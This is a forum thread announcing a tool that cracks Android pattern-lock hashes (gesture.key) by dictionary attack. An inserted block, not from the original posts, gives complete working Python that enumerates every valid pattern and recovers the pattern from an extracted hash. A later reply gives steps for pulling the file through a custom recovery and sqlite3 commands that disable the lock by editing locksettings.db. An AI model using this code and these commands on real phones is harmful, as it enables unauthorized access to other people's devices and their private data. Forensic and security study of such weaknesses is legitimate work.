Author Topic: [Tool] Android Screenlock Gesture Crack  (Read 2187 times)


Offline Psycho_Coder

  • Knight
  • **
  • Posts: 166
  • Cookies: 84
  • Programmer, Forensic Analyst
[Tool] Android Screenlock Gesture Crack
« on: October 22, 2015, 02:21:58 pm »
AndroidGestureCrack

Cracks Android Screenlock Gesture Pattern using dictionary Attack

Description

A Java tool to crack the gesture screenlock pattern of an Android phone. Android's pattern lock stores a SHA1 hash of the pattern in a gesture.key file in the /data/system folder in the internal memory of the Android device. It has been tested on Android API Level 15 and up, but should work with lower versions as well. As long as you extract the gesture.key file, this tool will work well. The key is a SHA1 hash of the sequence of bytes of the pattern. The hash is unsalted and hence very easy to crack. The code uses the dictionary which you can download from the link below:

Download Dictionary

Usage

You need to get the gesture.key file from the Android device's hidden system folder and extract the dictionary file from the link above. Use them in the following way:

Code:
java -jar AndroidGestureCrack.jar --gui
or
java -jar AndroidGestureCrack.jar gesture.key AndroidGestureSHA1.txt

Sample Run

(screenshots omitted)
Note: There is scope to improve the GUI (I haven't used any layouts in general, but if you make some changes then let me know).

Project Link: https://github.com/AnimeshShaw/AndroidGestureCrack
Download Latest release: https://github.com/AnimeshShaw/AndroidGestureCrack/releases/download/v2.0-beta/AndroidGestureCrack.jar

You require Java 8 to compile the code.
« Last Edit: November 11, 2015, 07:07:28 pm by Psycho_Coder »
"Don't do anything by half. If you love someone, love them with all your soul. When you hate someone, hate them until it hurts."--- Henry Rollins
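A worked version of the attack the post describes, added here as an example (it is not code from AndroidGestureCrack): it enumerates every pattern the lock screen will accept (a node cannot be revisited, and a move that passes over a third node is only allowed if that node was already drawn), hashes each node sequence with unsalted SHA-1 exactly as gesture.key stores it, and looks the extracted 20-byte file up in that table. The dictionary the post links to is the same 389,112-entry table written out as text; generating it on the fly takes a few seconds in Python. Assumed: the file has already been pulled off the device by other means (adb on a rooted phone, or a custom recovery, as discussed later in the thread); the sample key built in main is constructed from a known pattern, not taken from a device. Caveat a practitioner will want: Android 6.0 and later no longer write gesture.key (the pattern is kept as a salted hash in gatekeeper.pattern.key), so check that the file exists at all before reaching for this.

```python
"""Offline crack of an Android gesture.key (added example, not the project's code).

Assumes the storage format the post describes: gesture.key holds the raw 20-byte
SHA-1 of the pattern's node indices (0..8, row-major on the 3x3 grid), no salt.
"""
import hashlib

GRID = 3  # 3x3 pattern grid, nodes numbered 0..8 row-major


def _middle(a: int, b: int):
    """Node lying on the straight line between a and b, if there is one.

    The lock screen auto-selects such a node when your finger drags across it,
    so a pattern may only jump a -> b if the middle node is already drawn.
    """
    ra, ca = divmod(a, GRID)
    rb, cb = divmod(b, GRID)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None  # not exactly two grid steps apart in a straight line
    m = ((ra + rb) // 2) * GRID + (ca + cb) // 2
    return None if m in (a, b) else m


def valid_patterns(min_len: int = 4, max_len: int = 9):
    """Yield every node sequence Android's pattern lock accepts."""
    def walk(path, visited):
        if len(path) >= min_len:
            yield tuple(path)
        if len(path) == max_len:
            return
        last = path[-1]
        for nxt in range(GRID * GRID):
            if visited & (1 << nxt):
                continue  # nodes cannot be reused
            mid = _middle(last, nxt)
            if mid is not None and not visited & (1 << mid):
                continue  # would jump over a node that is not drawn yet
            path.append(nxt)
            yield from walk(path, visited | (1 << nxt))
            path.pop()

    for start in range(GRID * GRID):
        yield from walk([start], 1 << start)


def gesture_key(pattern) -> bytes:
    """The 20 bytes Android writes to /data/system/gesture.key for a pattern."""
    return hashlib.sha1(bytes(pattern)).digest()


def build_table():
    """digest -> pattern for all valid patterns: the 'dictionary' as a lookup table."""
    return {gesture_key(p): p for p in valid_patterns()}


def crack(key: bytes, table=None):
    """Return the pattern whose hash is `key`, or None if nothing matches.

    With a prebuilt table this is a single dict lookup; without one it streams
    through the candidates and hashes each, which needs almost no memory.
    """
    if len(key) != 20:
        raise ValueError(f"gesture.key must be a raw 20-byte SHA-1 digest, got {len(key)} bytes")
    if table is not None:
        return table.get(key)
    for p in valid_patterns():
        if gesture_key(p) == key:
            return p
    return None


def load_gesture_key(path: str) -> bytes:
    with open(path, "rb") as f:
        return f.read()


def draw(pattern) -> str:
    """Render the pattern as a 3x3 grid showing the order nodes were touched."""
    order = {n: str(i + 1) for i, n in enumerate(pattern)}
    return "\n".join(
        " ".join(order.get(r * GRID + c, ".") for c in range(GRID)) for r in range(GRID)
    )


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        key = load_gesture_key(sys.argv[1])          # a gesture.key pulled from a device
    else:
        key = gesture_key((0, 3, 6, 7, 8))           # constructed sample: an L-shaped pattern
    hit = crack(key)
    if hit is None:
        print("no valid pattern hashes to this value")
    else:
        print("pattern:", hit)
        print(draw(hit))
```

Run it as `python crack_gesture.py /path/to/gesture.key`; with no argument it cracks the constructed sample. The enumeration rule is what makes the keyspace small: only 389,112 sequences survive the no-reuse and no-skip constraints, which is why an unsalted hash of the node bytes is effectively no protection once the file is in hand.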

Offline Psycho_Coder

  • Knight
  • **
  • Posts: 166
  • Cookies: 84
  • Programmer, Forensic Analyst
Re: [Tool] Android Screenlock Gesture Crack
« Reply #1 on: October 23, 2015, 06:27:04 pm »
Update: Made a few small changes and added an executable jar.

Offline Trevor

  • Serf
  • *
  • Posts: 39
  • Cookies: 18
  • Coder, Reverser
Re: [Tool] Android Screenlock Gesture Crack
« Reply #2 on: October 23, 2015, 06:48:15 pm »
The algorithm behind this, for those who are interested:

http://www.cclgroupltd.com/a-rainbow-table-for-android-pattern-locks/

Offline Psycho_Coder

  • Knight
  • **
  • Posts: 166
  • Cookies: 84
  • Programmer, Forensic Analyst
Re: [Tool] Android Screenlock Gesture Crack
« Reply #3 on: November 11, 2015, 07:12:12 pm »
Thread Updated and a new version has been released. Now it comes along with a GUI as well.

Offline 0E 800

  • Not a VIP
  • VIP
  • Baron
  • *
  • Posts: 895
  • Cookies: 131
  • • тнε ιηтεяηεт ιs мү яεcүcℓε-вιη •
Re: [Tool] Android Screenlock Gesture Crack
« Reply #4 on: November 11, 2015, 07:34:13 pm »
Nice work.

Is it possible to get the gesture.key without a rooted phone?
Is it possible to get the key if you are unable to enable ADB on the phone?

The invariable mark of wisdom is to see the miraculous in the common.

Offline Saw

  • Serf
  • *
  • Posts: 20
  • Cookies: -3
  • Hell lives inside me
Re: [Tool] Android Screenlock Gesture Crack
« Reply #5 on: November 12, 2015, 08:03:06 pm »
Won't the phone get locked down due to the number of retries?
Something SomeDay will be Here.

Offline 0E 800

  • Not a VIP
  • VIP
  • Baron
  • *
  • Posts: 895
  • Cookies: 131
  • • тнε ιηтεяηεт ιs мү яεcүcℓε-вιη •
Re: [Tool] Android Screenlock Gesture Crack
« Reply #6 on: November 12, 2015, 08:11:44 pm »
Won't the phone get locked down due to the number of retries?

It's an offline brute-force method. You retrieve gesture.key from the device and then run the brute-forcer against it on another machine.

Offline gray-fox

  • Knight
  • **
  • Posts: 208
  • Cookies: 52
Re: [Tool] Android Screenlock Gesture Crack
« Reply #7 on: November 13, 2015, 11:33:05 am »
Is it possible to get the gesture.key without a rooted phone?
Is it possible to get the key if you are unable to enable ADB on the phone?
I'll try to answer these questions, but I have to say this may not be the latest or most correct info, just something I have learned while doing stuff with my own devices.

The answer to both questions is yes in theory, but it still needs quite optimal conditions. If the phone has a custom recovery, or if you can flash one to it (which does not require a rooted device), then you can boot to recovery, mount the /data partition and copy gesture.key to an external SD card or a USB device via OTG. At least TWRP has a file manager and terminal access in it, so it can be done with one of those tools. But the phone's bootloader might need to be unlocked (in case of flashing something to it), and then it's kind of game over, because unlocking the bootloader wipes the device completely.

----End of the actual answer---

As additional info: if the pattern doesn't need to be cracked and you can freely tamper with the device, then on most Android versions/devices you could also just disable the pattern lock if you can get access to the /data partition. I know this is very common knowledge to most, but if the phone is running KitKat or earlier Android you could just delete gesture.key and the pattern lock gets disabled.

With my Nexus 5 running Android 5.1 I was able to disable the pattern lock by tampering with the "/data/system/locksettings.db" database.
Code:
sqlite3 /data/system/locksettings.db
delete from locksettings where name='lockscreen.password_type';
.exit
Then reboot, and the pattern lock was disabled. Not sure how widely this works across different devices/Lollipop versions, and you would need to push a copy of sqlite3 to the phone if it doesn't have it already.

But a really nice tool anyway, OP, +1.
« Last Edit: November 13, 2015, 01:11:24 pm by gray-fox »